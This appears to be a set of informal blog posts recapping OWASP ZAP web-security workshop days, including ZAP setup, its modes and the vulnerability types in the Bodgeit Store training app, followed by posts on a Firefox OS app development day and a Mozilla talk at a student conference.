Securing Web @ZAP Day-4

I Started the session of 4th day by introducing new technical terms and discussed about the previous worksheet he had given in day 3. Apparently, the worksheet is based on Web Application security as well as ZAP source code.

 In this session we introduced the main functions in ZAP as well as the package located in.
I  gave a little talk on  ZAP API  how to access it. ” Curl ” , a tool which helps to transfer the data to or from a server and “HttpOnlyFlag”, which is used to prevent the malicious code from sending the data from our website to attackers website.

Later we introduced about ” Saros “plugin , which is a Collaborating tool for Eclipse IDE, It’s actually essential for a team of members who work on a single project so that they can be on sync with the modifications done during the project real-time working process.

Saros is very useful application which includes features like chat option with the team members, current view of other users who are working on the project.

Sumanth later, started sharing some knowledge about the User interface modules of ZAP tool. He explained about, the way the packages are split in the ZAP source, instead of researching for those packages from all the files. It’s a heck long procedure by the way!

Later myself and sanjay explained about Swing Explorer which is an open source tool used on any Swing based applications to explore swing elements like Windows, Frames, Buttons and a few other elements visually. Actually, we can browse all the hierarchy of the components. We also taught them about  how to add new tabs in different positions of ZAP User interface like ” Left “, ” Right ” , ” Footer “, etc..

                                          

I later introduced “The Bodgeit Store ” which is a vulnerable application actually developed for newbies to work on penetration testing.
Bodgeit Store is made of few vulnerabilities like :
1. Cross Site Scripting
2. SQL injection
3. Unprotected content ( hidden )
4. Cross Site Request Forgery
5. Debug Code
6. Insecure Object References
7. Application Logic vulnerabilities

Securing Web @ZAP Day-3

3rd Day ZAP workshop started at time in the Collab House and I started taking pics as I was feeling little bored. Then after some time Sumanth Damarla started the workshop, starting with Day-2 Worksheet discussion where he briefly explained about the important key terms that are present in the worksheet.

Key Terms:

-> Clickjacking   
-> X-Frame Options    
-> Port 80 & Port 443    
-> HTTP & HTTPS    
-> Privilege HTTPS    
-> Third-Party API function    
-> Input Validation       
-> Blocklisting        
-> Whitelisting

1) Clickjacking is a malicious technique of tricking a Web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages.

2) X-Frame Options which offered a partial protection against clickjacking. There are three possible values for X-Frame-Options:-> Deny: The page cannot be displayed in a frame, regardless of the site attempting to do so.-> Sameorigin:The page can only be displayed in a frame on the same origin as the page itself.-> Allow-from uri:The page can only be displayed in a frame on the specified origin.  

3) Port 80 & Port 443:

-> Port 80 is the port that the server "listens to" or expects to receive from a Web client, assuming that the default was taken when the server was configured or set up.
-> Port 443 is for SSL. Since SSL is "opaque" to outsiders, firewalls cannot see what is going inside it, and cannot do some transparent proxying.

4) HTTP & HTTPS:
-> Hypertext Transfer Protocol (HTTP) is a protocol used in networking. When you type any web address in your web browser, your browser acts as a client, and the computer having the requested information acts as a server.
-> Hyper Text Transfer Protocol Secure (HTTPS) is the secure version of HTTP, the protocol over which data is sent between your browser and the website that you are connected to. The 'S' at the end of HTTPS stands for 'Secure'. It means all communications between your browser and the website are encrypted.

5) Privilege HTTPS used to gain elevated access to resources that are normally protected from an application or user. The result is that an application with more privileges.  

        

6) Third-party API function: The idea behind developing applications with third-party APIs is that it’s often easier to use someone else’s service than spend your own time developing a product. Third-party merchants can grant you permission to execute many different operations on their behalf.  

7) Input Validation can be used to detect unauthorized input before it is processed by the application.   
-> A Whitelist is testing a desired input against a list of possible correct input's. To do this you would compile a list of all the good input values/conditions, then verify that the input received IS one of this correct conditions.  
-> A Blacklist is testing a desired input against a list of negative input's. Basically you would compile a listing of all the negative or bad conditions, then verify that the input received is not one of the bad or negative conditions.                                                                                                                                 

After that we all had a 10 minutes break and we started tweeting about the ZAP event in the twitter. Then I started talking about ZAP API UI and OWASP Summer Code Sprint 2015.

About it: The OWASP Summer Code Sprint 2015 is a program that aims to provide incentives to students to contribute to OWASP projects. By participating in the OWASP Summer Code Sprint a student can get real life experience while contributing to an open source project. A student that successfully completes the program will receive in total $1500.

Follow this link- https://www.owasp.org/index.php/Summer_Code_Sprint2015

  Setting-up ZAP environment setting in the Eclipse.

ZAP Environment Setting:  

Myself,Sanjay Gouri and Sumanth helped out the Participants in installing ZAP in their Laptops.Ofcourse we faced few technical problems but at the end we successfully Installed the ZAP environment in all the laptops.

Again break for half an hour and had a palyed   OWASP Snakes & Ladders.

About it: Snakes & Ladders is an educational project. It uses gamification to promote awareness of application security controls and risks, and in particular knowledge of other OWASP documents and tools.

Game Time:

Started with six players all of them throwing dice one by one to decide who should start the game first. There is also a crazy thing going over their when we were playing the game that's tweeting tweets in the twitter. So its a Game with a tweet.

After that we all had a group pic with Snakes & Ladders.

Securing Web @ZAP Day-2

On the second day of workshop we had installed the ZAP software and taught them  about the User Interface of ZAP software. After Installing ZAP  we have taken a session about generating a Dynamic SSL certificate and installing on Firefox browser. This SSL certificate is installed on browser for testing the websites using the browser plugin tool as a manual testing of vulnerabilities.

Later I explained them about the modes of ZAP tool which are used for finding out the vulnerabilities i.e Safe mode, Protected Mode, Standard Mode and Attack Mode.

                                  

I explained them with a demo on using the ZAP in standard mode and attacking on a test site and showed them the vulnerabilities like XSS Cross Site scripting and other vulnerabilities.
I have also explained about many features of  ZAP tool like Intercepting, Fizzing, Spiders and scanners.

                                

 In day two we covered many important concepts like :

• UI
  
• Intercepting
• Fuzzing concepts
• Proxy concepts
• Testing web application

Finally the workshop was ended with a Worksheet which add many questions related to network security and vulnerabilities.

FirefoxOS App Day@VNRVJIET

Hello guys…..
We are here with an amazing Mozilla event happened in the city aiming at developing Webapps for Firefox OS. We conducted one day Firefox OS App development session at one of the top Engineering colleges in Hyderabad. Here we go with commencement of event…..

The event held on On 2nd March 2015 from 10.00 am to 4.00 pm. Organizers have actively participated in taking the event forward. Around 80 enthusiastic participants who were very really interested in developing applications attended the event.
The team (Sumanth, Akshay, Sudarshan(Myself), Sanjay) have done a great job in delivering the content and help the participants in the app development. Thank you !!

AGENDA :
10:00 am – 10:30 am INTRODUCTION TO OPEN SOURCE CULTURE
10:30 am – 11:00 pm INTRODUCTION TO MOZILLA AND ITS PROJECTS
11:00 pm – 11:30 pm BRIEF INTRODUCTION ON FIREFOX OS APP DEVELOPMENT
11:30 pm – 11:45 pm INTRODUCTION TO APP MAKER
11:45 pm – 12:30 pm LUNCH BREAK
12:30 pm – 03:15 pm PARTICIPANTS DEVELOPING THEIR APPLICATIONS
03:15 pm – 04:00 pm DEMOS BY PARTICIPANTS AND SWAG DISTRIBUTION
It was a great workshop. This workshop has educated about the open source culture and Mozilla principles. We taught about the App development in the Firefox OS. This was a kickstart for all the beginners. It was a hands-on session , which helped the novice. All the participants were very happy about the workshop. The organizers have got a few replies from the participants about the session.

 

One of the Participant Feedback:
#1
Today’s workshop is totally very interesting and very useful not only to computer science people but also who were interested in creating new apps.. It’s Time to create ones own app.. The basics we learned in this workshop, that’s quite interesting and we hope these workshops are really very helpful to us. And I’m really thankful to those who conducting these workshops, so that we can learn from our 1st year onwards and we can give our best. Special thanks to our seniors and respective members of Mozilla Firefox for your valuable workshop….
#2
Being a First year student
Honestly I didn’t know anything about HTML
I just had some knowledge from the school .so it was a bit helpful .I learnt that creating apps in an open source OS is not really that hard .All you got to have is some new thought . So on the whole I would say it was technically bit confusing to me because of my standards but by the end of the day I was able create a small app with a coloured background with pics and links and I felt happy about that.. And many more….
Participants were looking forward for many more advanced workshops from Mozilla Team.
Our hospitality team at college has presented a plant for Mozilla team which we gonna be planted in the campus on behalf of Mozilla…..!!  #gogreen

Mozilla is pleased to be Knowledge Partner for the Reboot conference which was aimed at students who come together to experience secret of Self-Motivation, learn crucial Entrepreneur skills and discover opportunities.
We had a gathering of 150 students at the conference. Mozilla took an initiative to spread the word about open source culture. I took the opportunity to bring awareness among the participants about the Open Source, Mozilla Mission, Mozilla Manifesto and how Mozilla was striving for building and safe guarding Open Web.
Mozilla session was started at 2:00PM. I presented few videos and slides which covers the topics:

• The Web We Want : An Open Letter.
• Mozilla Manifesto.
• Contribution opportunities at Mozilla
• The Webmaker Project.
• Firefox for Android.

The day ended with Swag Distribution and taking foxy groupfie B|
Special thanks to Sumanth and Sanjay for helping me with the event organizing and Execution.
Here are the few moments captured at Reboot….